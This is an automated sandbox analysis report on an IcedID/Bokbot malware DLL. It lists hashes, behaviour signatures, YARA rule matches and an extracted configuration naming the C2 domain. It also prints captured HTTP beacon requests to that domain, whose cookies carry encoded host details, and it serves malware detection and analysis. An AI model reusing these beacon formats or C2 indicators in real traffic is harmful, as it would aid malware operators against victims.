Windows Analysis Report
J5V5DR.dll

Overview

General Information

Sample Name: J5V5DR.dll
Analysis ID: 632638
MD5: 9b692f43d575acb739decfc809db7f2e
SHA1: bc42c60590cb908e765e2d97e8b3a92b4616cd30
SHA256: 0581f0bf260a11a5662d58b99a82ec756c9365613833bce8f102ec1235a7d4f7
Tags: dllexeIcedID
Infos:

Detection

IcedID
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected IcedID
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Yara signature match
Tries to load missing DLLs
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Registers a DLL
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality for execution timing, often used to detect debuggers

Classification

AV Detection

barindex
Source: 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: IcedID {"Campaign ID": 109932505, "C2 url": "ilekvoyn.com"}
Source: J5V5DR.dll Virustotal: Detection: 13% Perma Link
Source: J5V5DR.dll ReversingLabs: Detection: 12%
Source: Yara match File source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.278941809.000001D395CB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll64.exe PID: 6832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6868, type: MEMORYSTR
Source: Yara match File source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPE
Source: J5V5DR.dll Static PE information: DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Networking

barindex
Source: C:\Windows\System32\rundll32.exe Domain query: ilekvoyn.com
Source: C:\Windows\System32\rundll32.exe Network Connect: 64.227.182.2 80 Jump to behavior
Source: Malware configuration extractor URLs: ilekvoyn.com
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=323130393739:686172647A:38333943384646433645323531353035; __io=0; _gid=67AFED4C8997Host: ilekvoyn.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=323130393739:686172647A:31323037463731444444363041413743; __io=0; _gid=67AFED4C8997Host: ilekvoyn.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.4; _u=323130393739:686172647A:45324342413344443837343036393933; __io=0; _gid=67AFED4C8997Host: ilekvoyn.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=109932505:1:3929:119; _gat=10.0.17134.64; _ga=1.329303.0.4; _u=323130393739:686172647A:37383344384639433838463446394437; __io=0; _gid=67AFED4C8997Host: ilekvoyn.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 May 2022 19:00:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 30 61 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6c 65 6b 76 6f 79 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ilekvoyn.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 May 2022 19:00:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 30 61 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6c 65 6b 76 6f 79 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ilekvoyn.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 May 2022 19:00:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 30 61 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6c 65 6b 76 6f 79 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ilekvoyn.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 May 2022 19:00:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 30 61 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 69 6c 65 6b 76 6f 79 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ilekvoyn.com Port 80</address></body></html>0
Source: loaddll64.exe, 00000000.00000002.306399602.00000239D2CF0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279011932.000001D397AA0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.279346138.000001EDE5CF0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ilekvoyn.com/
Source: rundll32.exe, 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ilekvoyn.com/4
Source: rundll32.exe, 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ilekvoyn.com/Y
Source: rundll32.exe, 00000004.00000002.279383760.000001EDE5D16000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ilekvoyn.com/u5
Source: regsvr32.exe, 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ilekvoyn.com:80/
Source: loaddll64.exe, 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shapka-youtube.ru/
Source: unknown DNS traffic detected: queries for: ilekvoyn.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=323130393739:686172647A:38333943384646433645323531353035; __io=0; _gid=67AFED4C8997Host: ilekvoyn.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=323130393739:686172647A:31323037463731444444363041413743; __io=0; _gid=67AFED4C8997Host: ilekvoyn.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=109932505:1:3916:123; _gat=10.0.17134.64; _ga=1.329303.0.4; _u=323130393739:686172647A:45324342413344443837343036393933; __io=0; _gid=67AFED4C8997Host: ilekvoyn.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=109932505:1:3929:119; _gat=10.0.17134.64; _ga=1.329303.0.4; _u=323130393739:686172647A:37383344384639433838463446394437; __io=0; _gid=67AFED4C8997Host: ilekvoyn.com

E-Banking Fraud

barindex
Source: Yara match File source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.278941809.000001D395CB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll64.exe PID: 6832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6868, type: MEMORYSTR
Source: Yara match File source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPE

System Summary

barindex
Source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPE Matched rule: Detects IceID / Bokbot variants Author: ditekSHen
Source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE Matched rule: Detects IceID / Bokbot variants Author: ditekSHen
Source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects IceID / Bokbot variants Author: ditekSHen
Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE Matched rule: Detects IceID / Bokbot variants Author: ditekSHen
Source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects IceID / Bokbot variants Author: ditekSHen
Source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects IceID / Bokbot variants Author: ditekSHen
Source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects IceID / Bokbot variants Author: ditekSHen
Source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects IceID / Bokbot variants Author: ditekSHen
Source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPE Matched rule: Detects IceID / Bokbot variants Author: ditekSHen
Source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects IceID / Bokbot variants Author: ditekSHen
Source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects IceID / Bokbot variants Author: ditekSHen
Source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects IceID / Bokbot variants Author: ditekSHen
Source: 4.2.rundll32.exe.1ede3f59841.1.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 4.2.rundll32.exe.1ede3fcb648.2.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 0.2.loaddll64.exe.239d139d591.2.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 3.2.rundll32.exe.1d395c5b848.1.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 2.2.regsvr32.exe.b99811.0.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 2.2.regsvr32.exe.c091b8.1.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 3.2.rundll32.exe.1d395be9aa1.2.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 0.2.loaddll64.exe.239d1412178.1.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_00000001800024FC 0_2_00000001800024FC
Source: C:\Windows\System32\regsvr32.exe Code function: 2_2_00000001800024FC 2_2_00000001800024FC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00000001800024FC 3_2_00000001800024FC
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000001800024FC 4_2_00000001800024FC
Source: C:\Windows\System32\loaddll64.exe Code function: 0_2_00007FFC65B1542B NtMapViewOfSection,NtCreateSection, 0_2_00007FFC65B1542B
